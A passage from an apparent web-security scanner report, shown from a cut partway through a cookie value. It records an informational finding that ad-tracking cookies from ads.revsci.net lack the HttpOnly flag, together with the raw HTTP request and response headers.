)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!$t!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)~~!!tjQ!!!!$<xqZB!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3_i!!!!#<yMiw!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; path=/; expires=Wed, 08-May-2013 01:01:03 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 01:01:03 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
13.25. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpeUeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jzv8rD7yvDmvWDQ0Q8aZIAiDGSo49tlyo/qaXH5wQBQZoGx8vtub+wYEktHO6BM7/uLrdNXC7XGW2RoRccmRQldIeS8HXSTpZFxLggkcDjvNYOoGY5VZbYTnh36BiBOSmypBu+2iq2QDXMLkcK2uHT/C8yL+QzA9VXQB66zprk8rmpiNuQ+aVh/A47qdJNDn8qjknSHNRViyA6Lf9VLCsOvSBW/nO5bs5zsYbyjNLDs0tlY72ojd62XiPpxCcc3uKexC5DTRnhh3dyjVxPGSKlTmvlnr9aGHKHTLVK+Pbf8ptc5PMhhlo0YzcsATzNxrLbRoT3O3q8ARpCvgM02ra6StjkCMXHMHSO08i3XfCPZLjNdRaZogP3Ujafe16GMiz7s91qA4p5CB/lHJr+0KppLU7y9WBhmEa47Ru+ljaZ072rhbhEcmxw9qqLNU/Qhz9Jcu1BKQ80Yxf197S1IJ5HEjQj4x8ot9dp6PtQCbnIte0dkNtJgvyKbqABW/4Y9BTvL9lB5N3cnK0q0eAm7RmvrQsA06FWH3VQOB9HtLNz/xTbZK7hCVXAebPf6jRXHD0nkXRlRjiWS6ey6ODk7jWoiqPWwr+x2FHdnLpzowfuBuaZPFbrr5//T+tJPg0eKuCLr3R4K6PTUqHpej1AArZPQTL6FLqPQT4jVC3KzTCEGa4CaAnHY0Zrqs3d5iDVBUqwlTDxNfC7Ga9LeLy7/TcjcspKJyoaFh/2WC0jsAA3fEz6gj7U8mHA9cZFqj1IA6CoHNofMMWxvZ1EP/MiaMCqu1NxvqRz/nXou9NXXRguDHgUMu+z/yqY7XVxJWePCdb1p/q0Ew6qECQtyV6d8GNEFQloez/xBOOBcaKVasrabhh1mQhT1NABEEl0kGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GepXRxh4CCs9Y7SE/BWKnzNyBxrgIJBjNX2fpVDk9Qsy0jVeGn3pOqTP3l4YuJ1ioOHQT1JoRoJIKV4KRQq6Uzfq06fBDaJQf2kAQmgasQb39TGpsoAAZ5fvxckeQEMeOXTASaI1R/+6s3NCrVMLC7QIoUNHB/pGHS/OcquP8g8+avfDQBV+QwQIEjhL6Iy4vOheGZSgcslcOuTo9uMDkQcD4TrVKgsZIcfxEvv59B9klF63vqdAxxVxWmQS/tta5XA0ec/K359cVqOUV61/1Z4ODlvwuT29lxjH3/Y2sHLLMADwAXCR12/hlj15BfplbSqflcwddB3qetl5l4Zp7Z85bCzMG3I2xqoeKfJnKV+bExcZUxDS3oaeHUpFHUs4N5ehhFRt110WtEiM3U8HX32Gj4Hp80Y48x4dEhHIyopb6KyUupuEWF0HYN10tmN/yOvbv3JznYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHiTF000ztP6EaHxQuNUeUotUExw=="; rsi_segs_1000000=pUPF5EOhMHIMN9L9XlOlhjCqMTK6hyRPhgO8/StXBMiwvUtfk2+f8pQBVnH6C1XL1Gj8ORJBPU0K18kquspNa2xO16VkbVFmPmFED/ROfss5MyaTFfhDp+yuExR1/a/IX2Hsyr1RynCW3gOqnFCbXsrgMNvCjwrXqmW2SlkxMp41EdMh9G78sGWNa/7GgZLldatK42V74Yg88W1YkZYf4F9AsRF3ZJU9DT1GHinjto6CMfbUZHldNeJBI6Flkjn2aekrtvERgpwmTyxMruLCaTR9t2E+Hj4dpKoaF4RblayFT/zAnvz2zkNwTna5rE/qk7Q+LphTnobN4Hb4fOsR4xMJVxQOqMgY5elWxPq4MbAA4pr9NcZGvV75dLPsz196Bi/xLxZb8iUPsr91zpM4TgqyjuOtnP0lITIukH4pqFfI4PAuqIffOunVFSOU+KJNu9RTMJv3MjLvRTQKWMJzx4Q+yKHmJCBbAPelw0lKw7E1yBNbQD9fS9KaCUyagBuyoH/dxaWYFEq0KJmG+9Dj0/SQE7msZCu6fHMFzfqi; rtc_M6m_=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KnyU="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt57xKhGoM8agCQamtbp6FA0C8r6hsCwn0LMa6VYK+RJFJdSmUgvaZFUEhKeV/lNyFVDTjFDfEdzvor2lDHK10e9qyUjpRsXhu+Khv10rUO1cy3NXmzFcyYbPBb09aMYYjI92uefzrflJpWDkksXImDtnrZMzmWhmqntyZJIYSpuGNnlaKnoyDMN4hkA1MaQmWONQ9SfPCOd+DzWLpzlYElceBfj8Mii5YoPmnpx1l4Hm+KIcDJBS/Jw9qMbxTWDRJpuJ8NSmGa/FNxcNm6IGXP8FtnksMxY20+wv9vrt1nomYYv0F3kosfHVhxjE1us53sGnLZPIF40KwXUmya0xxySzxXennPMhhzaAxEbMAC2oZhlpVpTnYe2VtEa8ouVH8hcd6cMKWHCubzux08ZVAedkGI4h0HYFfb8f7l43JYbHIZVWB1N0yDeJyVCO7uunFuZO3rnXqVFfokpdGxkGHW+VZqIY7/W35uE05p5um7DQciLIFyeYT66olNC9kyJ6mfzxp9PAdxMRkImm0heZ3TRs7+Zmht/siXf1gb0XBvHCY+aPmOceLmEopdjBIUPhwbmcXE8l2x6k2avhD+VhPUocjMvwyg6R8JRmNdBkXUBv8m+CONQeeTyqRoLr31uaCGppO4CdRaD2DZqTlGnmW89vxFRAZPbD1KQvLI3VTelIwQNy1Sn0CwLm7Pcm8J7r4SLfxH8A1XoyUwxfgSucBv7Pu1EUTVplEo4Az3qqjAudfpf9pR6MrGu5WPCsYRlEaJ0C9DlsgmxzylP1sNKSRJyoGkAUzw/uFbasUvOMpyQef8yf2EDiPc8mm1tQgq7nn7+Xqx/pL0cRgQ/+wqg01p9bTmCqvaQ/w5T/K6sFEHIpcxQHzDtIxQEycZosr3qTIeFUD3VzHNqL8OH1kf66vl09b1ktBpOj/LVqpF9rC4BcstIijBOShpSkwZ1iUn1qzJvtT8UqJQ1bH9+gsl0f1gT5QH29SmwJbCwUqenUWdNzHgKd4="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jz/8LS/qtrmdrNs/WPSUdnAuxledavN124ASJwVH5lHOqeC4o2fHI9QkQeor8FSjRptD7ENVbUid4nnMBw2upjcbtYuTDvN4rywpZM+lNko5Uk2nK7JHuMGglo8RJ+zavMl5k4QS+ByXHOYJUmot0jFa/RAeaBZWp/5lVDfiO4DCOl8TWjUogUEIlBqKzKxDdiLBDTJPBfPUiGyQcVpITHK+y/KVrz0wpV3qqXjxlJKAxKiws1pQ4d2eeALQw7rizeuIA3XTBP02CnkjOCzewSlIn4ICcjQ3dqrAm47lPCcu5r3CG7ssJ+6ybGZMxstP8Nlg87KkUXGticKQIuBLZ2Tuk0IVlb/WHLQAJfxSM4LoD+9V7nDsImFh2TN07pq5VuZpjOdk8NciCVK+bL6GH2tBGszPgcAmqUQQcf68D6nG4soZhseR6kfG1msnRfIQ6YN4F+QmTV2YQU6qEv2DIcFX4LGKJtyUngsYb2TVBYvzulli9+Qchog8R/Pbu0AobCZyqQzelJI0425PYt10r+1CgqeaNGbN04YVBPkqO3EMZrLjhKcxyk8Y88za1lPcMau1kzTY2gA4JBtaDM5h1v371u9QWA86hBrknU3NaWAHpnOhkvA0d5bzCClzfOR5HDFFURdGkciFWOVneIeDusRkE++AXPlmELHwV5Cq5T7D5ZRR+gZSwM/0Tg8Rf4YUMX4AWl4kbk3U2fysKoA10Lbf1qnkIQO2teVcV2Fu5rcrRq/Vh2GYRGsNBDUUHHbDlXjD4r0Oc0vNXWlCbOpGhgdQKRwkmytvhtJ3xqN38ReBBrpSlij9LNa14JyRwaXtf/MVe4G1pQzlNTlNFVkIch35oqrfFGtY4V9rGR/cES+/EaxrDg6smRtKpyYqy4DlTuHiRPbBaJyJ2m6PwoGbdcSs385mv8bopFIuec0Jbz/9IKa/wYyYNfhFv5v33uvJSN5MTcenode/j2vODUxKQxlGEROKcsJbuTvq607lezL0LNNB5mMi30PlNyanRSr8syPQMdRMAn0wRQoBufya2Ye13EMXiKoOoPCHzt9//8huq4WaUxs6dB8utHb4mWy7/2IGSCE6LrcNkJpYkPy/w2E3BY70eR/7TQGARmNSSlY4Ku9M3cGotjtZzfMXFgZfG7evRnC+c243e973YLpq